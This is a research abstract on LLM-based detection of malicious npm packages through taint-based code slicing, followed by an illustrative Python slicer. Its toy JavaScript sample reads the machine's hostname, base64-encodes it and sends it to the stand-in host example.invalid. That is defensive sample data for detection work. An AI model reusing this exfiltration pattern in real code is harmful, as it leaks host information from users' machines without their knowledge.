Taint-Based Code Slicing for LLMs-based Malicious NPM Package Detection

Software supply chain attacks targeting the npm ecosystem have become increasingly sophisticated, leveraging obfuscation and complex logic to evade traditional detection mechanisms. Recently, large language models (LLMs) have attracted significant attention for malicious code detection due to their strong capabilities in semantic code understanding. However, the practical deployment of LLMs in this domain is severely constrained by limited context windows and high computational costs. Naive approaches, such as token-based code splitting, often fragment semantic context, leading to degraded detection performance. To overcome these challenges, this paper introduces a novel LLM-based framework for malicious npm package detection that leverages code slicing techniques. A specialized taint-based slicing method tailored to the JavaScript ecosystem is proposed to recover malicious data flows. By isolating security-relevant logic from benign boilerplate code, the approach reduces the input code volume by over 99% while preserving critical malicious behaviors. The framework is evaluated on a curated dataset comprising over 7000 malicious and benign npm packages. Experimental results using the DeepSeek-Coder-6.7B model demonstrate that the proposed approach achieves a detection accuracy of 87.04%, significantly outperforming a full-package baseline based on naive token splitting (75.41%). These results indicate that semantically optimized input representations via code slicing not only mitigate the LLM context window bottleneck but also enhance reasoning precision for security analysis, providing an effective defense against evolving open-source software supply chain threats.
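
To make the idea of taint-based slicing concrete, the following is a minimal sketch and not the paper's implementation. It assumes a straight-line program whose statements have already been annotated by hand with the variables they define and use, and with hypothetical source and sink flags (here, reading the hostname is the source and an outbound HTTPS request is the sink). The names `Stmt`, `taint_slice`, and `PROGRAM` are invented for illustration; a real tool would derive this information from a JavaScript AST and would also have to handle control flow, aliasing, and calls across files.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Stmt:
    """One hand-annotated statement (hypothetical representation)."""
    line: int
    text: str
    defs: frozenset = frozenset()   # variables written by the statement
    uses: frozenset = frozenset()   # variables read by the statement
    is_source: bool = False         # introduces sensitive data
    is_sink: bool = False           # sends data out or executes it


def taint_slice(stmts):
    """Keep only statements that feed a sink reached by tainted data."""
    # Forward pass: propagate taint from sources through assignments.
    tainted_vars, tainted_lines = set(), set()
    for s in stmts:
        if s.is_source or (s.uses & tainted_vars):
            tainted_vars |= s.defs
            tainted_lines.add(s.line)
        else:
            tainted_vars -= s.defs  # overwritten with clean data

    # Backward pass: from each tainted sink, collect the definitions it needs.
    needed, kept = set(), set()
    for s in reversed(stmts):
        if s.is_sink and s.line in tainted_lines:
            kept.add(s.line)
            needed |= s.uses
        elif s.defs & needed:
            kept.add(s.line)
            needed = (needed - s.defs) | s.uses
    return [s for s in stmts if s.line in kept]


# Toy package: boilerplate mixed with a hostname exfiltration flow.
PROGRAM = [
    Stmt(1, "const os = require('os');", defs=frozenset({"os"})),
    Stmt(2, "const https = require('https');", defs=frozenset({"https"})),
    Stmt(3, "const banner = 'v1.0.0';", defs=frozenset({"banner"})),
    Stmt(4, "console.log(banner);", uses=frozenset({"banner"})),
    Stmt(5, "const host = os.hostname();", defs=frozenset({"host"}),
         uses=frozenset({"os"}), is_source=True),
    Stmt(6, "const payload = Buffer.from(host).toString('base64');",
         defs=frozenset({"payload"}), uses=frozenset({"host"})),
    Stmt(7, "const unused = 42;", defs=frozenset({"unused"})),
    Stmt(8, "https.get('https://example.invalid/?d=' + payload);",
         uses=frozenset({"https", "payload"}), is_sink=True),
]

if __name__ == "__main__":
    for s in taint_slice(PROGRAM):
        print(s.line, s.text)
```

On this toy input the slice keeps lines 1, 2, 5, 6, and 8 and drops the banner and unused-constant statements, so the text handed to a model contains only the source-to-sink flow and its dependencies. Naive token splitting, by contrast, could cut between lines 5 and 8 and place the source and the sink in different chunks.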
